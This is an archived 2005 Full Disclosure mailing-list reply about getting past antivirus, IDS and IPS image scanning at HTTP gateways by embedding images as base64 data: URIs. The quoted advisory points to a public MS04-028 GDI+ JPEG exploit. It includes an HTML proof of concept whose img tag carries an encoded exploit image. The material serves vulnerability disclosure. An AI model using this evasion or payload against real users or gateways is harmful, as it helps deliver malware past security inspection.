Full Disclosure mailing list archives
Re: Multi-vendor AV gateway image inspection bypass vulnerability
From: Darren Bounds <lists () intrusense com>
Date: Tue, 11 Jan 2005 14:58:43 -0500
Hello Danny,This vulnerability is only applicable to the HTTP data while in transit. Once received by the client the image will be rendered and subsequently detected if local AV software.
At the present time, I'm not aware of any AV, IDS or IPS vendor that will detect malicious images imbedded in HTML in this manner.
Thank you, Darren Bounds Intrusense, LLC. -- Intrusense - Securing Business As Usual On Jan 11, 2005, at 2:14 PM, Danny wrote:
On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds <dbounds () intrusense com> wrote:-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Multi-vendor AV gateway image inspection bypass vulnerability January 10, 2005 A vulnerability has been discovered which allows a remote attacker to bypass anti-virus(as well other security technologies such as IDS and IPS) inspection ofHTTP image content. By leveraging techniques described in RFC 2397 for base64 encoding image content withinthe URL scheme. A remote attack may encode a malicious image within thebody of an HTML formatted document to circumvent content inspection. For example: http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php The source code at the URL above will by default create a JPEG image that will attempt (and failwithout tweaking) to exploit the Microsoft MS04-028 GDI+ vulnerability.The image itself is detected by all AV gateway engines tested (Trend, Sophos and McAfee), however, when the same imageis base64 encoded using the technique described in RFC 2397 (documentedbelow), inspection is not performed and is delivered rendered by the client. While Microsoft Internet Explorer does not support the RFC 2397 URL scheme; Firefox, Safari, Mozilla and Opera do and will render the data and thus successfully execute the payload if the necessary OS and/or application patches have not been applied. ## BEGIN HTML ## <html> <body> <img src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD// gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw/ X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF B QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU FB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/ bAEMACAYGBwYFCAcHBwkJ CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv /b AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj Iy MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/ xAAfAAABBQEBAQEBAQAAAAAAAAAA AQIDBAUGBwgJCgv/ xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGR oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2 Rl ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExc bH yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/ xAAfAQADAQEBAQEBAQEBAAAAAAAA AQIDBAUGBwgJCgv/ xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWm Nk ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8 TF xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/ APn+iiigD//Z"> </body> </html> ## END HTML ## Solution: While AV vendor patches are not yet available, fixes for all currently known image vulnerabilities are and have been for several months. If you have not yet applied them, you have your own negligence to blame. Contributions: Thanks to Scott Roeder and Jacinto Rodriquez their assistance in platform testing.I believe TrendMicro's OfficeScan (client-server scanner) will catch it, but I am not sure about their gateway device. What was their response? ...D
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Multi-vendor AV gateway image inspection bypass vulnerability Darren Bounds (Jan 10)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Jeff Gillian (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability - KMail Noam Rathaus (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Danny (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Darren Bounds (Jan 11)
- <Possible follow-ups>
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Nils Ketelsen (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Frank Knobbe (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Frank Knobbe (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Jeff Gillian (Jan 11)